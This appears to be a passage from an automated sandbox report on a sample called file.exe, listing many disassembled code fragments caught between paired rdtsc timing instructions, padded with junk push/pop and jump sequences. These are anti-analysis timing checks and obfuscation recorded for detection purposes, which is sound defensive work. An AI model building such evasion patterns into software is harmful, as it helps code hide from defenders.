              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1653 second address: 11B1657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1302 second address: 11B1306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B448A second address: 11B4499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB8DCDE9E36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4499 second address: 11B44AD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB8DCE20296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FB8DCE20296h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B3F22 second address: 11B3F37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E41h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9069 second address: 11B906F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125EE4 second address: 1125F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCDE9E43h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FB8DCDE9E36h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B87D9 second address: 11B87DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B87DD second address: 11B87E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007FB8DCDE9E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C16 second address: 11B8C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C1C second address: 11B8C46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FB8DCDE9E36h 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB8DCDE9E3Dh 0x00000018 jmp 00007FB8DCDE9E3Ah 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9B2 second address: 11BB9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB8DCE20296h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9BC second address: 11BB9DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8DCDE9E46h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9DC second address: 11BB9E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9E1 second address: 11BB9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB8DCDE9E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BB9ED second address: 11BB9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FB8DCE202A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE05 second address: 11BBE0F instructions: 0x00000000 rdtsc 0x00000002 js 00007FB8DCDE9E3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE0F second address: 11BBE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE16 second address: 11BBE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE1E second address: 11BBE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE24 second address: 11BBE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE31 second address: 11BBE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE35 second address: 11BBE50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8DCDE9E41h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE50 second address: 11BBE68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE68 second address: 11BBE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB8DCDE9E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BBE72 second address: 11BBE76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C196D second address: 11C1980 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FB8DCDE9E36h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1980 second address: 11C199A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C199A second address: 11C199E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C021A second address: 11C025F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE2029Fh 0x00000007 jmp 00007FB8DCE202A8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007FB8DCE202B4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB8DCE202A2h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C077B second address: 11C0789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 ja 00007FB8DCDE9E36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0789 second address: 11C078E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C078E second address: 11C0798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB8DCDE9E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0798 second address: 11C07BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB8DCE2029Ah 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0912 second address: 11C0916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116DEFF second address: 116DF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FB8DCE2029Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FB8DCE20298h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D1C2Ah] 0x00000030 movzx ecx, cx 0x00000033 push 00000004h 0x00000035 and edx, 792BD3C5h 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e jmp 00007FB8DCE2029Ch 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0A6E second address: 11C0A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FB8DCDE9E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C0C33 second address: 11C0C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FB8DCE202A2h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9872 second address: 11C9877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C79E2 second address: 11C79E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C7B6F second address: 11C7B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FB8DCDE9E36h 0x00000009 jng 00007FB8DCDE9E36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C89C1 second address: 11C89CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB8DCE20296h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C89CB second address: 11C89CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1CFE second address: 11D1D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8DCE202A6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1D18 second address: 11D1D32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB8DCDE9E40h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1D32 second address: 11D1D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8DCE202A4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1D4A second address: 11D1D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1ED4 second address: 11D1ED9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D22D9 second address: 11D22DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D22DD second address: 11D22E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D22E3 second address: 11D22E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D22E8 second address: 11D2325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB8DCE20296h 0x0000000a jc 00007FB8DCE20296h 0x00000010 popad 0x00000011 ja 00007FB8DCE20298h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push ebx 0x0000001d jng 00007FB8DCE20296h 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop ebx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FB8DCE2029Dh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2446 second address: 11D244E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D244E second address: 11D2459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB8DCE20296h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D25EF second address: 11D25F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D25F3 second address: 11D260D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCE202A0h 0x00000007 js 00007FB8DCE202A2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D260D second address: 11D2613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2744 second address: 11D277A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 pushad 0x0000000a jmp 00007FB8DCE202A2h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB8DCE202A1h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D93F2 second address: 11D93FC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB8DCDE9E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9541 second address: 11D955F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB8DCE20296h 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007FB8DCE20296h 0x00000012 popad 0x00000013 jo 00007FB8DCE20298h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D99E9 second address: 11D99F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D99F1 second address: 11D99F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D99F5 second address: 11D99FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA270 second address: 11DA276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA276 second address: 11DA27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E1AB6 second address: 11E1ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E17B0 second address: 11E17C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8DCDE9E3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FB8DCDE9E36h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E30FC second address: 11E3107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB8DCE20296h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3107 second address: 11E310C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E310C second address: 11E3117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E49D1 second address: 11E49D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E49D7 second address: 11E49E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4804 second address: 11E4808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4808 second address: 11E4818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB8DCE202A2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E4818 second address: 11E4830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB8DCDE9E36h 0x0000000a popad 0x0000000b jo 00007FB8DCDE9E59h 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EACB6 second address: 11EACBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDC60 second address: 11EDC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB8DCDE9E3Dh 0x0000000a jg 00007FB8DCDE9E42h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FB8DCDE9E3Fh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F6169 second address: 11F616F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F616F second address: 11F6179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5D30 second address: 11F5D3C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5D3C second address: 11F5D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA275 second address: 11FA27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA27E second address: 11FA288 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8DCDE9E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFEDF second address: 11FFEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFEE5 second address: 11FFF1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FB8DCDE9E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB8DCDE9E43h 0x00000019 jmp 00007FB8DCDE9E43h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFF1F second address: 11FFF32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB8DCE2029Ah 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FFF32 second address: 11FFF43 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8DCDE9E3Ah 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120159D second address: 12015A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209006 second address: 120900A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120900A second address: 120901A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007FB8DCE20296h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120901A second address: 120901E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12134C2 second address: 12134C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211D43 second address: 1211D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB8DCDE9E36h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211D4D second address: 1211D72 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8DCE20296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB8DCE202A3h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211D72 second address: 1211D7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211D7A second address: 1211D7F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212075 second address: 1212096 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8DCDE9E36h 0x00000008 jmp 00007FB8DCDE9E3Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007FB8DCDE9E3Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
